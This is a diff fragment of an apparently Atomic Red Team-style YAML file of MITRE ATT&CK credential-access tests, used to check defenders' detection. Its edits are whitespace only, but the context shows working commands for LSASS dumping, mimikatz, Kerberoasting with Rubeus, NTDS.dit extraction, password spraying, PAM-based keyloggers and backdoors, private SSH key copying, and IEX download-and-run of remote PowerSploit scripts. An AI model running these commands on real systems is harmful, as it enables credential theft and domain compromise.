/domain:#{domain} /user:#{user}@#{domain}" "exit" - ' +' T1556.001: technique: external_references: @@ -1979,7 +1979,7 @@ credential-access: description: 'This module runs the Windows executable of PetitPotam in order to coerce authentication for a remote system. - ' +' supported_platforms: - windows input_arguments: 
@@ -2008,11 +2008,11 @@ credential-access: prereq_command: 'if (Test-Path "#{petitpotam_path}") { exit 0 } else { exit 1 } - ' +' get_prereq_command: 'Invoke-WebRequest "https://github.com/topotam/PetitPotam/blob/2ae559f938e67d0cd59c5afcaac67672b9ef2981/PetitPotam.exe?raw=true" -OutFile "#{petitpotam_path}" - ' +' executor: name: powershell elevation_required: false @@ -2161,7 +2161,7 @@ credential-access: to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'' - ' +' name: bash - name: PowerShell - Prompt User for Password auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 @@ -2292,7 +2292,7 @@ credential-access: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) - ' +' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -2370,25 +2370,25 @@ credential-access: dependencies: - description: 'Computer must be domain joined - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually - ' +' - description: 'Rubeus must exist - ' +' prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable} - ' +' executor: name: powershell elevation_required: false 
@@ -2482,26 +2482,26 @@ credential-access: files on the Domain Controller. This value can be decrypted with gpp-decrypt on Kali Linux. - ' +' supported_platforms: - windows dependency_executor_name: powershell dependencies: - description: 'Computer must be domain joined - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually - ' +' executor: command: 'findstr /S cpassword %logonserver%\sysvol\*.xml - ' +' name: command_prompt - name: GPP Passwords (Get-GPPPassword) auto_generated_guid: e9584f82-322c-474a-b831-940fd8b4455c @@ -2526,25 +2526,25 @@ credential-access: dependencies: - description: 'Get-GPPPassword PowerShell Script must exist at #{gpp_script_path} - ' +' prereq_command: 'if(Test-Path "#{gpp_script_path}") {exit 0 } else {exit 1 } - ' +' get_prereq_command: | New-Item -ItemType Directory (Split-Path "#{gpp_script_path}") -Force | Out-Null Invoke-WebRequest #{gpp_script_url} -OutFile "#{gpp_script_path}" - description: 'Computer must be domain joined - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually - ' +' executor: command: | . #{gpp_script_path} @@ -2717,15 +2717,15 @@ credential-access: dependencies: - description: 'Computer must be domain joined - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 
@@ -2760,37 +2760,37 @@ credential-access: description: command flags you would like to run (optional and blank by default) type: String - default: + default: dependency_executor_name: powershell dependencies: - description: 'Computer must be domain joined - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually - ' +' - description: 'Rubeus must exist - ' +' prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable} - ' +' executor: command: | klist purge cmd.exe /c "#{local_folder}\#{local_executable}" kerberoast #{flags} /outfile:"#{local_folder}\#{out_file}" cleanup_command: 'Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore - ' +' name: powershell elevation_required: false - name: Extract all accounts in use as SPN using setspn @@ -2810,19 +2810,19 @@ credential-access: dependencies: - description: 'Computer must be domain joined - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually - ' +' executor: command: 'setspn -T #{domain_name} -Q */* - ' +' name: command_prompt - name: Request A Single Ticket via PowerShell auto_generated_guid: 988539bc-2ed7-4e62-aec6-7c5cf6680863 
@@ -2836,15 +2836,15 @@ credential-access: dependencies: - description: 'Computer must be domain joined - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually - ' +' executor: command: "Add-Type -AssemblyName System.IdentityModel\n$ComputerFQDN=$env:LogonServer.trimStart('\\') + \".\" + $env:UserDnsDomain\nNew-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken @@ -2867,15 +2867,15 @@ credential-access: dependencies: - description: 'Computer must be domain joined - ' +' prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually - ' +' executor: command: "Add-Type -AssemblyName System.IdentityModel \nsetspn.exe -T #{domain_name} -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken @@ -3044,7 +3044,7 @@ credential-access: .\T1056.001\src\Get-Keystrokes.ps1 -LogPath #{filepath} cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Living off the land Terminal Input Capture on Linux with pam.d @@ -3063,14 +3063,14 @@ credential-access: dependencies: - description: 'Checking if pam_tty_audit.so is installed - ' +' prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so'' - ' +' get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so and recompile, for this test to work" - ' +' supported_platforms: - linux executor: 
@@ -3101,14 +3101,14 @@ credential-access: - description: 'This test requires to be run in a bash shell and that logger and tee are installed. - ' +' prereq_command: | if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true @@ -3118,7 +3118,7 @@ credential-access: tail /var/log/syslog cleanup_command: 'unset PROMPT_COMMAND - ' +' - name: Bash session based keylogger auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258 description: "When a command is executed in bash, the BASH_COMMAND variable @@ -3135,14 +3135,14 @@ credential-access: dependencies: - description: 'This test requires to be run in a bash shell - ' +' prereq_command: 'if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi - ' +' get_prereq_command: 'echo "" - ' +' input_arguments: output_file: name: output_file @@ -3158,7 +3158,7 @@ credential-access: cat #{output_file} cleanup_command: 'rm #{output_file} - ' +' - name: SSHD PAM keylogger auto_generated_guid: 81d7d2ad-d644-4b6a-bea7-28ffe43becca description: 'Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. 
@@ -3166,20 +3166,20 @@ credential-access: of TTY input and capture all keystrokes in a ssh session and place them in the /var/log/audit/audit.log file after the session closes. - ' +' supported_platforms: - linux dependency_executor_name: sh dependencies: - description: 'This test requires sshd and auditd - ' +' prereq_command: | if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi get_prereq_command: 'echo "" - ' +' input_arguments: user_account: description: Basic ssh user account for testing. @@ -3193,7 +3193,7 @@ credential-access: restart auditd\nssh #{user_account}@localhost \nwhoami\nsudo su\nwhoami\nexit\nexit\n" cleanup_command: 'cp -fv /tmp/sshd /etc/pam.d/ - ' +' - name: Auditd keylogger auto_generated_guid: a668edb9-334e-48eb-8c2e-5413a40867af description: "The linux audit tool auditd can be used to capture 32 and 64 bit @@ -3205,14 +3205,14 @@ credential-access: dependencies: - description: 'This test requires sshd and auditd - ' +' prereq_command: 'if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi - ' +' get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true @@ -3221,7 +3221,7 @@ credential-access: $(date +\"%d/%m/%y %H:%M:%S\") \n" cleanup_command: 'systemctl restart auditd - ' +' T1557.001: technique: external_references: @@ -3541,10 +3541,10 @@ credential-access: - description: 'Windows Credential Editor must exist on disk at specified location (#{wce_exe}) - ' +' prereq_command: 'if (Test-Path #{wce_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: | $parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip" [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 
@@ -3584,10 +3584,10 @@ credential-access: - description: 'ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe}) - ' +' prereq_command: 'if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip" @@ -3598,7 +3598,7 @@ credential-access: command: "#{procdump_exe} -accepteula -ma lsass.exe #{output_file}\n" cleanup_command: 'del "#{output_file}" >nul 2> nul - ' +' name: command_prompt elevation_required: true - name: Dump LSASS.exe Memory using comsvcs.dll @@ -3613,10 +3613,10 @@ credential-access: command: 'C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full - ' +' cleanup_command: 'Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Dump LSASS.exe Memory using direct system calls and API unhooking @@ -3639,10 +3639,10 @@ credential-access: - description: 'Dumpert executable must exist on disk at specified location (#{dumpert_exe}) - ' +' prereq_command: 'if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null @@ -3651,7 +3651,7 @@ credential-access: command: "#{dumpert_exe}\n" cleanup_command: 'del C:\windows\temp\dumpert.dmp >nul 2> nul - ' +' name: command_prompt elevation_required: true - name: Dump LSASS.exe Memory using NanoDump 
@@ -3669,21 +3669,21 @@ credential-access: - description: 'NanoDump executable must exist on disk at specified location ($env:TEMP\nanodump.x64.exe) - ' +' prereq_command: 'if (Test-Path $env:TEMP\nanodump.x64.exe) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/helpsystems/nanodump/raw/84db0c1737bbe027431733c193cfacf59a07259b/compiled/nanodump.x64.exe" -OutFile "$env:TEMP\nanodump.x64.exe" executor: command: '%temp%\nanodump.x64.exe -w "%temp%\nanodump.dmp" - ' +' cleanup_command: 'del "%temp%\nanodump.dmp" >nul 2> nul - ' +' name: command_prompt elevation_required: true - name: Dump LSASS.exe Memory using Windows Task Manager @@ -3726,10 +3726,10 @@ credential-access: dependencies: - description: 'Mimikatz must exist on disk at specified location (#{mimikatz_exe}) - ' +' prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href @@ -3739,19 +3739,19 @@ credential-access: Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force - description: 'Lsass dump must exist at specified location (#{input_file}) - ' +' prereq_command: 'cmd /c "if not exist #{input_file} (exit /b 1)" - ' +' get_prereq_command: 'Write-Host "Create the lsass dump manually using the steps in the previous test (Dump LSASS.exe Memory using Windows Task Manager)" - ' +' executor: command: '#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit - ' +' name: command_prompt elevation_required: true - name: LSASS read with pypykatz 
@@ -3768,35 +3768,35 @@ credential-access: dependencies: - description: 'Computer must have python 3 installed - ' +' prereq_command: | py -3 --version >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'echo "Python 3 must be installed manually" - ' +' - description: 'Computer must have pip installed - ' +' prereq_command: | py -3 -m pip --version >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'echo "PIP must be installed manually" - ' +' - description: 'pypykatz must be installed and part of PATH - ' +' prereq_command: | pypykatz -h >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'pip install pypykatz - ' +' executor: command: 'pypykatz live lsa - ' +' name: command_prompt elevation_required: true - name: Dump LSASS.exe Memory using Out-Minidump.ps1 @@ -3813,7 +3813,7 @@ credential-access: IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump cleanup_command: 'Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Create Mini Dump of LSASS.exe using ProcDump @@ -3841,10 +3841,10 @@ credential-access: - description: 'ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe}) - ' +' prereq_command: 'if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip" Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force @@ -3854,7 +3854,7 @@ credential-access: command: "#{procdump_exe} -accepteula -mm lsass.exe #{output_file}\n" cleanup_command: 'del "#{output_file}" >nul 2> nul - ' +' name: command_prompt elevation_required: true - name: Powershell Mimikatz 
@@ -3876,7 +3876,7 @@ credential-access: command: 'IEX (New-Object Net.WebClient).DownloadString(''#{remote_script}''); Invoke-Mimikatz -DumpCreds - ' +' name: powershell elevation_required: true - name: Dump LSASS with .Net 5 createdump.exe @@ -3898,15 +3898,15 @@ credential-access: dependencies: - description: 'Computer must have createdump.exe from .Net 5 - ' +' prereq_command: 'if (Test-Path ''#{createdump_exe}'') {exit 0} else {exit 1} - ' +' get_prereq_command: 'echo ".NET 5 must be installed manually." "For the very brave a copy of the executable can be found here: https://github.com/Scoubi/RedTeam-Tools/blob/main/createdump.exe" - ' +' executor: command: | echo "Createdump Path #{createdump_exe}" @@ -3916,7 +3916,7 @@ credential-access: & "#{createdump_exe}" -u -f #{output_file} $ID cleanup_command: 'Remove-Item #{output_file} -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Dump LSASS.exe using imported Microsoft DLLs @@ -3941,10 +3941,10 @@ credential-access: dependencies: - description: 'Computer must have xordump.exe - ' +' prereq_command: 'if (Test-Path ''#{xordump_exe}'') {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe} @@ -3952,7 +3952,7 @@ credential-access: command: "#{xordump_exe} -out #{output_file} -x 0x41\n" cleanup_command: 'Remove-Item #{output_file} -ErrorAction Ignore - ' +' name: powershell elevation_required: true T1557: 
@@ -4158,19 +4158,19 @@ credential-access: dependencies: - description: 'Target must be a Domain Controller - ' +' prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT - ' +' get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller must be done manually - ' +' executor: command: 'vssadmin.exe create shadow /for=#{drive_letter} - ' +' name: command_prompt elevation_required: true - name: Copy NTDS.dit from Volume Shadow Copy @@ -4197,34 +4197,34 @@ credential-access: dependencies: - description: 'Target must be a Domain Controller - ' +' prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT - ' +' get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller must be done manually - ' +' - description: 'Volume shadow copy must exist - ' +' prereq_command: 'if not exist #{vsc_name} (exit /b 1) - ' +' get_prereq_command: 'echo Run "Invoke-AtomicTest T1003.003 -TestName ''Create Volume Shadow Copy with vssadmin''" to fulfill this requirement - ' +' - description: 'Extract path must exist - ' +' prereq_command: 'if not exist #{extract_path} (exit /b 1) - ' +' get_prereq_command: 'mkdir #{extract_path} - ' +' executor: command: | copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit 
@@ -4256,22 +4256,22 @@ credential-access: dependencies: - description: 'Target must be a Domain Controller - ' +' prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT - ' +' get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller must be done manually - ' +' executor: command: | mkdir #{output_folder} ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q cleanup_command: 'rmdir /q /s #{output_folder} >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Create Volume Shadow Copy with WMI @@ -4290,19 +4290,19 @@ credential-access: dependencies: - description: 'Target must be a Domain Controller - ' +' prereq_command: 'reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT - ' +' get_prereq_command: 'echo Sorry, Promoting this machine to a Domain Controller must be done manually - ' +' executor: command: 'wmic shadowcopy call create Volume=#{drive_letter} - ' +' name: command_prompt elevation_required: true - name: Create Volume Shadow Copy remotely with WMI @@ -4325,18 +4325,18 @@ credential-access: - description: 'Target must be a reachable Domain Controller, and current context must be domain admin - ' +' prereq_command: 'wmic /node:"#{target_host}" shadowcopy list brief - ' +' get_prereq_command: 'echo Sorry, can''t connect to target host, check: network, firewall or permissions (must be admin on target) - ' +' executor: command: 'wmic /node:"#{target_host}" shadowcopy call create Volume=#{drive_letter} - ' +' name: command_prompt elevation_required: true - name: Create Volume Shadow Copy with Powershell 
@@ -4500,11 +4500,11 @@ credential-access: dependencies: - description: 'Check if at least one of tcpdump or tshark is installed. - ' +' prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; - ' +' get_prereq_command: "(which yum && yum -y epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n" executor: @@ -4530,11 +4530,11 @@ credential-access: dependencies: - description: 'Check if at least one of tcpdump or tshark is installed. - ' +' prereq_command: 'if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; - ' +' get_prereq_command: "(which yum && yum -y epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)\n" executor: @@ -4577,14 +4577,14 @@ credential-access: - description: 'tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe". - ' +' prereq_command: if (test-path "#{tshark_path}") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url} Start-Process $env:temp\wireshark_installer.exe /S - description: 'npcap must be installed. - ' +' prereq_command: if (test-path "#{npcap_path}") {exit 0} else {exit 1} get_prereq_command: | Invoke-WebRequest -OutFile $env:temp\npcap_installer.exe #{npcap_url} @@ -4592,7 +4592,7 @@ credential-access: executor: command: '"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5 - ' +' name: command_prompt elevation_required: true - name: Windows Internal Packet Capture 
@@ -4759,10 +4759,10 @@ credential-access: dependencies: - description: 'Gsecdump must exist on disk at specified location (#{gsecdump_exe}) - ' +' prereq_command: 'if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 $parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe" @@ -4827,7 +4827,7 @@ credential-access: C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full cleanup_command: 'Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore - ' +' name: powershell elevation_required: true T1110.002: @@ -4995,7 +4995,7 @@ credential-access: description: 'Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges. - ' +' supported_platforms: - windows input_arguments: @@ -5008,14 +5008,14 @@ credential-access: - description: 'AtomicPasswordFilter.dll must exist on disk at specified location (#{input_dll}) - ' +' prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host "You must provide your own password filter dll" - ' +' executor: command: | $passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename @@ -5107,7 +5107,7 @@ credential-access: description: 'Attempts to brute force a single Active Directory account by testing connectivity to the IPC$ share on a domain controller - ' +' supported_platforms: - windows input_arguments: @@ -5130,7 +5130,7 @@ credential-access: description: 'Attempt to brute force Active Directory domain user on a domain controller, via LDAP, with NTLM or Kerberos - ' +' supported_platforms: - windows input_arguments: 
@@ -5180,7 +5180,7 @@ credential-access: auto_generated_guid: 5a51ef57-299e-4d62-8e11-2d440df55e69 description: 'Attempt to brute force Azure AD user via AzureAD powershell module. - ' +' supported_platforms: - azure-ad input_arguments: @@ -5197,14 +5197,14 @@ credential-access: dependencies: - description: 'AzureAD module must be installed. - ' +' prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} - ' +' get_prereq_command: 'Install-Module -Name AzureAD -Force - ' +' executor: name: powershell elevation_required: false @@ -5236,7 +5236,7 @@ credential-access: dependencies: - description: 'Check if running on a Debian based machine. - ' +' prereq_command: | if grep -iq "debian\|ubuntu\|kali" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi @@ -5244,7 +5244,7 @@ credential-access: if [ -x "$(command -v openssl)" ]; then echo "openssl installed"; else echo "install openssl"; fi get_prereq_command: 'apt-get update && apt-get install -y openssl sudo - ' +' executor: elevation_required: true command: | @@ -5267,7 +5267,7 @@ credential-access: rm /tmp/file cleanup_command: 'userdel target - ' +' name: sh - name: SUDO brute force Redhat auto_generated_guid: b72958a7-53e3-4809-9ee1-58f6ecd99ade @@ -5279,7 +5279,7 @@ credential-access: dependencies: - description: 'Check if running on a Redhat based machine. - ' +' prereq_command: | if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "Redhat"; else echo "NOT Redhat"; exit 1; fi if grep -Rq "pam_faillock" /etc/pam.d/*; then echo "pam_faillock configured"; exit 1; fi @@ -5287,7 +5287,7 @@ credential-access: if [ -x "$(command -v openssl)" ]; then echo "openssl installed"; else echo "install openssl"; fi get_prereq_command: 'yum -y update && yum install -y openssl sudo - ' +' executor: elevation_required: true command: | 
@@ -5310,7 +5310,7 @@ credential-access: rm /tmp/file cleanup_command: 'userdel target - ' +' name: sh T1555.005: technique: @@ -5476,13 +5476,13 @@ credential-access: dependencies: - description: 'List of domain users to password spray must exits at %temp%\users.txt - ' +' prereq_command: 'if not exist %temp%\users.txt (exit /b 1) - ' +' get_prereq_command: 'PathToAtomicsFolder\T1110.003\src\parse_net_users.bat - ' +' executor: name: command_prompt elevation_required: false @@ -5490,7 +5490,7 @@ credential-access: /user:"%userdomain%\%n" "#{password}" 1>NUL 2>&1 && @echo [*] %n:#{password} && @net use /delete %logonserver%\IPC$ > NUL - ' +' - name: Password Spray (DomainPasswordSpray) auto_generated_guid: 263ae743-515f-4786-ac7d-41ef3a0d4b2b description: | @@ -5589,14 +5589,14 @@ credential-access: dependencies: - description: 'AzureAD module must be installed. - ' +' prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} - ' +' get_prereq_command: 'Install-Module -Name AzureAD -Force - ' +' executor: name: powershell elevation_required: false @@ -5716,10 +5716,10 @@ credential-access: elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} - ' +' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} - ' +' - name: Malicious PAM module auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326 description: | 
@@ -5753,35 +5753,35 @@ credential-access: - description: 'The PAM development library must be installed to build the PAM module - ' +' prereq_command: 'if [ -f /usr/include/security/pam_modules.h ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'if [ -n "`which apt-get`" ]; then sudo apt-get -y install libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel; fi - ' +' - description: 'The PAM module must exist on disk at specified location (#{path_to_pam_module}) - ' +' prereq_command: 'if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source} - ' +' executor: name: sh elevation_required: true command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf} - ' +' cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf} - ' +' T1552.004: technique: id: attack-pattern--60b508a1-6a5e-46b1-821a-9f7b78752abf @@ -5856,14 +5856,14 @@ credential-access: executor: command: 'dir c:\ /b /s .key | findstr /e .key - ' +' name: command_prompt elevation_required: true - name: Discover Private SSH Keys auto_generated_guid: 46959285-906d-40fa-9437-5a439accd878 description: 'Discover private SSH keys on a macOS or Linux system. - ' +' supported_platforms: - macos - linux @@ -5879,17 +5879,17 @@ credential-access: executor: command: 'find #{search_path} -name id_rsa >> #{output_file} - ' +' cleanup_command: 'rm #{output_file} - ' +' name: sh - name: Copy Private SSH Keys with CP auto_generated_guid: 7c247dc7-5128-4643-907b-73a76d9135c3 description: 'Copy private SSH keys on a Linux system to a staging folder using the `cp` command. - ' +' supported_platforms: - linux input_arguments: 
@@ -5907,14 +5907,14 @@ credential-access: find #{search_path} -name id_rsa -exec cp --parents {} #{output_folder} \; cleanup_command: 'rm #{output_folder} - ' +' name: sh - name: Copy Private SSH Keys with rsync auto_generated_guid: 864bb0b2-6bb5-489a-b43b-a77b3a16d68a description: 'Copy private SSH keys on a Linux or macOS system to a staging folder using the `rsync` command. - ' +' supported_platforms: - macos - linux @@ -5933,14 +5933,14 @@ credential-access: find #{search_path} -name id_rsa -exec rsync -R {} #{output_folder} \; cleanup_command: 'rm -rf #{output_folder} - ' +' name: sh - name: Copy the users GnuPG directory with rsync auto_generated_guid: 2a5a0601-f5fb-4e2e-aa09-73282ae6afca description: 'Copy the users GnuPG (.gnupg) directory on a Mac or Linux system to a staging folder using the `rsync` command. - ' +' supported_platforms: - macos - linux @@ -5959,7 +5959,7 @@ credential-access: find #{search_path} -type d -name '.gnupg' -exec rsync -Rr {} #{output_folder} \; cleanup_command: 'rm -rf #{output_folder} - ' +' name: sh - name: ADFS token signing and encryption certificates theft - Local auto_generated_guid: 78e95057-d429-4e66-8f82-0f060c1ac96f @@ -5972,13 +5972,13 @@ credential-access: dependencies: - description: 'AADInternals module must be installed. - ' +' prereq_command: 'if (Get-Module AADInternals) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Install-Module -Name AADInternals -Force - ' +' executor: command: | Import-Module AADInternals -Force 
@@ -6018,14 +6018,14 @@ credential-access: dependencies: - description: 'AADInternals and ActiveDirectory modules must be installed. - ' +' prereq_command: 'if ($(Get-Module AADInternals) -or $(Get-Module -ListAvailable -Name ActiveDirectory)) {echo 0} else {echo 1} - ' +' get_prereq_command: 'Install-Module -Name AADInternals -Force - ' +' executor: command: "Import-Module ActiveDirectory -Force \nImport-Module AADInternals -Force | Out-Null\n#Get Configuration\n$dcServerName = (Get-ADDomainController).HostName\n$svc @@ -6120,7 +6120,7 @@ credential-access: dependencies: - description: 'Script to launch target process must exist - ' +' prereq_command: | test -f #{script_path} grep "#{pid_term}" #{script_path} @@ -6141,7 +6141,7 @@ credential-access: grep -i "PASS" "#{output_file}" cleanup_command: 'rm -f "#{output_file}" - ' +' - name: Dump individual process memory with Python (Local) auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63 description: | @@ -6169,7 +6169,7 @@ credential-access: dependencies: - description: 'Script to launch target process must exist - ' +' prereq_command: | test -f #{script_path} grep "#{pid_term}" #{script_path} @@ -6178,11 +6178,11 @@ credential-access: echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_path} - description: 'Requires Python - ' +' prereq_command: "(which python || which python3 || which python2)\n" get_prereq_command: 